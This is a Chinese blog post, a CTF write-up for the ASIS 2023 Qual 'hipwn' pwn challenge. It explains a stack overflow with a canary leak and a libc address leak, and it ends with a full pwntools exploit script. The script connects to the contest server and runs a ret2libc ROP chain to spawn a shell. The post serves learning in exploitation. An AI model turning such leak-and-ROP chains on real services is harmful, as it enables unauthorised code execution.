ASIS 2023 Qual - hipwn

最新推荐文章于 2024-09-14 21:53:48 发布
最新推荐文章于 2024-09-14 21:53:48 发布
阅读量120 收藏
点赞数
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lanpesk/article/details/133214089
版权

这比赛我就做了一题,一方面是时间不够了,还有一方面是我自己太菜了。只有一题题解也要记录的原因不是因为这题有多精妙,而是我想要记录一下我在这题中学习到的新工具以及新操作。

首先查看程序保护情况

wsl-kali@mylaptop:/mnt/f/Download/CTF/ASIS 2023 Qual/hipwn$ checksec chall 
[*] '/mnt/f/Download/CTF/ASIS 2023 Qual/hipwn/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

保护全开,我好像联系pwn以来第一次做这种。

接下来看看漏洞代码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int nbytes; // [rsp+Ch] [rbp-54h] BYREF
  char nbytes_4[72]; // [rsp+10h] [rbp-50h] BYREF
  unsigned __int64 v6; // [rsp+58h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  setbuf(_bss_start, 0LL);
  setbuf(stdin, 0LL);
  while ( 1 )
  {
    puts("How much???");
    __isoc99_scanf("%u", &nbytes);
    puts("ok... now send content");
    read(0, nbytes_4, nbytes);
    nbytes_4[nbytes] = 0;
    puts(nbytes_4);
    puts("wanna do it again?");
    __isoc99_scanf("%u", &nbytes);
    if ( nbytes != 1337 )
      break;
    puts("i knew it");
  }
  return 0;
}

读入的长度是我们自行输入的,所以这里存在一个栈溢出的漏洞。这个溢出部分的代码逻辑是在循环里面的,所以我们可以多次利用。

第一点:由于开启了Canary,所以我们要泄露,代码中直接为我们准备好了输出函数,所以我们只要覆盖canary的最高字节就可以将canary连带读出。

第二点:代码中没有system,binsh以及后门一类的gift。所以这题要打ret2libc,但是由于PIE,我们不知道地址。所以需要泄露地址。由main函数的加载与执行我们知道,main函数结束后会回到__libc__start_main,也就是说,我们main的返回地址是一个在libc中的地址,我们可以通过第二次连续覆盖到ebp,从而将ret的值读出,此举就泄露的libc的地址,使得我们可以进行ret2libc。

整体思路如上。

那么我们泄露出来这个ret的地址之后,我们如何去利用呢?首先,由于不同libc之间的代码偏移不同,我们无法直接得知__libc_start_main的地址信息。但是此题给出了pwn题的dockerfile,包含了二进制文件和Dockerfile。所以我们是可以拿到这题所使用的libc以及ld的。接下来计算偏移的问题需要我们进入到gdb去看,这里需要我们将二进制的运行环境转为特定的环境。

这里使用的是patchelf。

首先从docker的:

/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
/lib/x86_64-linux-gnu/libc.so.6

将我们需要的文件提取出来。

随后使用patchelf,修改二进制文件的连接器与libc指向:

patchelf --set-interpreter ./ld-linux-x86-64.so.2 --replace-needed libc.so.6 ./libc.so.6 chall

这个方式是直接指定libc,如果是设置rpath的话就是设置的查找路径,这里他给的就是一个指定的libc所以我们这里直接指定使用。注意,如果你只制定了libc但是没有指定与之配套的ld的话,程序是无法运行的。

设置完成后,运行这个二进制文件时就会链接指定的libc了。

后面的操作我自己进行的比较繁琐了,但是我现在也不知道有什么更好的方法。

进入gdb,在main函数执行完前序后(也可以直接看),我们来看栈:

pwndbg> stack 15
00:0000│ rsp 0x7fffffffd5a0 —▸ 0x555555554040 ◂— 0x400000006
01:0008│     0x7fffffffd5a8 —▸ 0x7ffff7fe285c ◂— mov rax, qword ptr [rsp + 0x58]
02:0010│     0x7fffffffd5b0 ◂— 0x0
03:0018│     0x7fffffffd5b8 —▸ 0x7fffffffd969 ◂— 0xbfd5120f439acde
04:0020│     0x7fffffffd5c0 —▸ 0x7ffff7fc2000 ◂— jg 0x7ffff7fc2047
05:0028│     0x7fffffffd5c8 ◂— 0x10101000000
06:0030│     0x7fffffffd5d0 ◂— 0x2
07:0038│     0x7fffffffd5d8 ◂— 0x1f8bfbff
08:0040│     0x7fffffffd5e0 —▸ 0x7fffffffd979 ◂— 0x34365f363878 /* 'x86_64' */
09:0048│     0x7fffffffd5e8 ◂— 0x64 /* 'd' */
0a:0050│     0x7fffffffd5f0 ◂— 0x1000
0b:0058│     0x7fffffffd5f8 ◂— 0xbfd5120f439ac00
0c:0060│ rbp 0x7fffffffd600 ◂— 0x1
0d:0068│     0x7fffffffd608 —▸ 0x7ffff7dbdd90 ◂— mov edi, eax
0e:0070│     0x7fffffffd610 ◂— 0x0

可以看到main的返回地址是0x7ffff7dbdd90。由于我们指定的libc加载,我这里也没有对应的debug信息,所以这里给不出这个函数跳回到哪里。没办法我们只能自己找了。查看返回地址对应的机器码:

pwndbg> x /10b 0x7ffff7dbdd90
0x7ffff7dbdd90: 0x89    0xc7    0xe8    0x59    0xb8    0x01    0x00    0xe8
0x7ffff7dbdd98: 0xd4    0x78

使用这个字节序列我们去IDA中查找:

.text:0000000000029D90 89 C7                         mov     edi, eax
.text:0000000000029D90
.text:0000000000029D92
.text:0000000000029D92                               loc_29D92:                              ; CODE XREF: sub_29D10+AA↓j
.text:0000000000029D92 E8 59 B8 01 00                call    exit
.text:0000000000029D92

我们在0x29d90处找到了这个序列。此时__libc_start_main的起始地址是0x29dc0。那么我们就得到了程序中泄露出来的返回地址与__libc_start_main之间的偏移,我们就能够得到运行中__libc_start_main的地址,从而计算libc的基址。后面就是正常的ret2libc流程了。

这里用的gadget都是在libc里面的,虽然我们也可以泄露text的地址,但是libc中已经有了,我们也就没有必要再多此一举了。

exp:

from pwn import *

context.log_level = "debug"
context.arch = "amd64"

elf = ELF("./chall")
rop = ROP("./chall")
libc = ELF("./libc.so.6")

r = remote("45.153.243.57", 1337)
# r = process("./chall")
# r = gdb.debug("./chall", "b main")

# leak the canary
r.sendlineafter(b"How much???\n", b'200')
leak = b"a"*(0x50 - 8 + 1) 
r.sendafter(b"ok... now send content\n", leak)
r.recv(len(leak))
canary = u64(r.recv(7).rjust(8, b"\x00"))
print(hex(canary))
r.sendlineafter(b"wanna do it again?\n", b"1337")

# leak return address
r.sendlineafter(b"How much???\n", b'200')
leak = b"a"*(0x50) + b"a"*8
r.sendafter(b"ok... now send content\n", leak)
ret_29D90 = u64(r.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
print(hex(ret_29D90))
offset = 0x29dc0 - 0x29d90
__libc_main =  ret_29D90 + offset
r.sendlineafter(b"wanna do it again?\n", b"1337")

# calculate the base 
base = __libc_main - libc.symbols["__libc_start_main"]
system = base + libc.symbols['system']
binsh = base + next(libc.search(b"/bin/sh"))
print(f"__libc_main: {hex(__libc_main)}")
print(f"system: {hex(system)}")
print(f"binsh: {hex(binsh)}")

# rop
r.sendlineafter(b"How much???\n", b'200')
rdi = 0x000000000002a3e5 # this gadget is in libc, because you dont know the text segment address
ret = 0x0000000000029cd6 # this gadget is in libc
payload = b"a"*(0x50 -8) + p64(canary) + b"a"*8 + p64(base + ret) + p64(base + rdi) + p64(binsh) + p64(system)
r.sendafter(b"ok... now send content\n", payload)
r.sendlineafter(b"wanna do it again?\n", b"1")

r.interactive()
lanpesk
关注
ASIS-CTF-Finals-2017 pwn Mary_Morton Writeup
qq_39596232的博客
09-03 635
题目描述: ASIS-CTF-Finals-2017 非常简单的热身pwn 分析思路: 1、首先查看文件的安全信息: tucker@ubuntu:~/xman/pwn$ file Mary_Morton Mary_Morton: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interp...
ASIS for GNAT-开源
05-15
ASIS 本身是 ISO / IEC 15291:1999 国际标准,确保了不同实现之间的兼容性,使得开发者可以编写一次工具,然后在遵循 ASIS 标准的不同 Ada 编译器上运行。这一标准的制定,极大地促进了 Ada 开发环境的生态系统发展...
[DASCTF 2023六月挑战赛|二进制专项] 5个pwn
weixin_52640415的博客
06-04 1449
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
ASIS-CTF-Finals-2017-Handicraft_RSA
MangoFengC++
03-29 854
题目 下载得到一个附件 f5346507773f4b909479387d59a01710 用Notepad++打开看看 ?zXZ 嬷碏 ! t/澹?j] 4J 鹘?d(/脘R?.窗(3幐U嶴D慗∑r嘔c縹谮}厍DZワk'磰~傊[杢?铹秄掑醾祖倻R{]`糷*2誻]~?Ъ师宼臬!?釼8Vi(船k~櫘?^霏蛽伸O蚬6ο 輐j/恵1瑅?? 搥?m溣/?簂[%秫蕮Iv?鸡v7卽?噽e逸弓:殮簎樍畉洅b蘕*嗹゜?ZYSf繜烰 !嚣飔痍燬藈N) H??{?h?x襸M櫚
Mary_Morton(ASIS-CTF-Finals-2017)--writeup
ATFWUS的博客
03-03 504
文件下载地址: 链接:https://pan.baidu.com/s/1on3lMupdI7YfPkQj7AmzEw 提取码:amqq 0x01.分析 checksec: 64位程序,开启了Canary,NX。 对源码得简单分析发现,程序提供了两个漏洞,格式化字符串漏洞和栈溢出,并且发现了程序得后门: 但是开启了cannary,我们无法直接覆盖返回地址,所以,我们必须利用格式...
ASIS-CTF-Finals-2017 Mary_Morton
qq_41071646的博客
01-11 1315
讲道理 这个 其实 感觉有两个方法  两种方法 都要调用一下    第一个  printf函数      第一个是 我们第一个可以    用printf  然后hook掉got的printf  不知道好不好实现  自己搜索了 资料 也没有发现  第二个 就是观察栈了  。。。。。。。 这里有个保护   就是  readfsqword  在 ida 的f5看的不是很清楚 我们 看 汇编窗...
堆溢出off-by-one (asis-ctf-2016 b00ks)
fuiifiuiii的博客
03-12 1356
这个写着最大32,但是无妨,可以更大,需要注意的是,这里输入的size必须是十进制数。(以前做的题往往喜欢输入成0x20,0x30等等)(看了看以前做的题,都是用atoi转了,所以可以那么输入。author name 输入为32,也就是这里的a2=32,经历了32次++a1后,a1[32]=0,而这是第33位。不知道为什么泄露出来的book_2_name的地址(也就是那个0x7f的)与libc_base的基地址偏移每次不同。泄露出book1的0x30大小的指挥块位置(这里指向的是id)
[XCTF-Reverse] 50 asis-ctf-quals-2016_catch-me
weixin_52640415的博客
03-22 251
下来的附件不能运行,用010打开看有7z开头应该是个压缩包,改扩展名解压后还不行,再看一上来是文件名,应该是tar打包的。其实就是用带压缩的tar打的包。 无壳,直接在ida打开,第1个v3的函数比较麻烦,看不懂放到gdb里运行断到这得到v3=0xbg11924e1 v3 = sub_400820(dword_6012B4); // 0xb11924e1 byte_6012A8[0] = HIBYTE(v3); byte_6012A9 = BYTE2(v3)
Asis CTF 2015-Car_Market
weixin_30657999的博客
10-29 132
恰好找到了这道题的bin文件,就来做一下。 这道题目是一个经典的选单程序但是具有三级选单,在bss段存在指针数组ptr,ptr中的值指向每个主结构,其中主结构如下所示。 [16] model [4] price [4] padding; [8] pointer共32byte 其中pointer会指向一个子结构customer [32] first_name...
堆溢出off-by-one(asis-ctf-2016 pwn 之 b00ks)
九层台
08-01 2354
这些天积累也知道了一些关于glibc内存的分配策略。 说pwn 是在内存里捉迷藏其实到这里才真正接触大片的内存。精确控制就能保证精确修改数据。 需要的一个很重要的能力就是跟内存的能力。 这里调试exp用gdb.attach(p)来下断点,弹出调试界面。跟踪内存。 用gdb的x命令/xg参数来查看内存以十六进制8字节显示。 这个程序开启了PIE跟踪不太容易,不过可以用find命令查找输入的...
asis-github-talk-notes:我在 GitHub 上与 ASIS 团队在 2252015 上的谈话笔记。接受拉取请求!
06-22
这些是我在 2015 年 2 月 25 日在 GitHub 上与 ASIS 团队谈话的笔记。 GitHub 是地球上最大的代码托管商,拥有超过2000 万个存储库。 无论大小,每个存储库都带有相同的强大工具。 这些工具对于公共项目对社区开放...
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库.docx
07-05
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库
ERP系统信息化资料:HGVS-ASIS 业务现状文档--采购增值本部与物流本部的结算 关系.doc
09-29
ERP系统信息化资料:HGVS-ASIS 业务现状文档--采购增值本部与物流本部的结算 关系.doc
UEFI学习笔记(五):EDK II PCD的概念、类型、使用
qq_44189622的博客
09-11 822
如果在BIOS里面有一些模块是binary方式集成进来的而这些binary又需要用到PCD(用于Binary Release),那么这些Binary集成的要用到的PCD就必须要设置为。PCD的值存在memory里面,下次启动时,上次更改的值丢失了,每次启动都是从default值开始。是存在VPD空间的(在FLASH上,只读),一般是出厂配置。如果platform是从源码build出来的,没有binary在里面的时候,PCD用的都是。作用域在一个模块中(模块级的),可以在Binary Level进行修改。
计算几何学习
网安小白
09-12 433
学习计算几何过程中对经典算法的记录
看Threejs好玩示例,学习创新与技术(二)
最新发布
htsitr2的专栏
09-14 308
它的主要特点是确保生成的点之间保持一定的最小距离,从而避免点的聚集。这种方法在计算机图形学、游戏开发、物理模拟等领域中非常有用,尤其是在需要生成自然分布的对象(如树木、石头等)时。如果不进行裁剪,那么效果如下(初步的锯齿感是因为矩形内采样的结果)。为啥这么复杂呢,为啥不开始存储每个方块的UV呢?下面代码的vTexCoords(=savedModelMatrix,已修改)记录方块所在的位置,vWorldPosition表示方块中像素的偏移。在上面那副图中,聪明的你一定初步猜到了每个方块的纹理是怎么得到的。
Qt之OpenCv 灰度处理、均值滤波、边缘检测学习
weixin_57695658的博客
09-11 1300
本章来学习一下opencv常见的操作,首先看下我们的Qt制作好的界面:源码在后面。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-11 895
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
ASIS+Quals
10-18
ASIS是Ada语义接口规范,它是已发布的国际ISO标准(ISO / IEC 15291:1999)。它提供了一种机制,使得可以在Ada程序中访问和操作程序的语法和语义信息。ASIS可以用于许多应用程序,例如代码分析、代码转换、代码生成和代码重构。而Quals是一种基于ASIS的工具,它可以用于静态代码分析和漏洞检测。Quals可以帮助开发人员发现和修复代码中的安全漏洞,从而提高软件的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值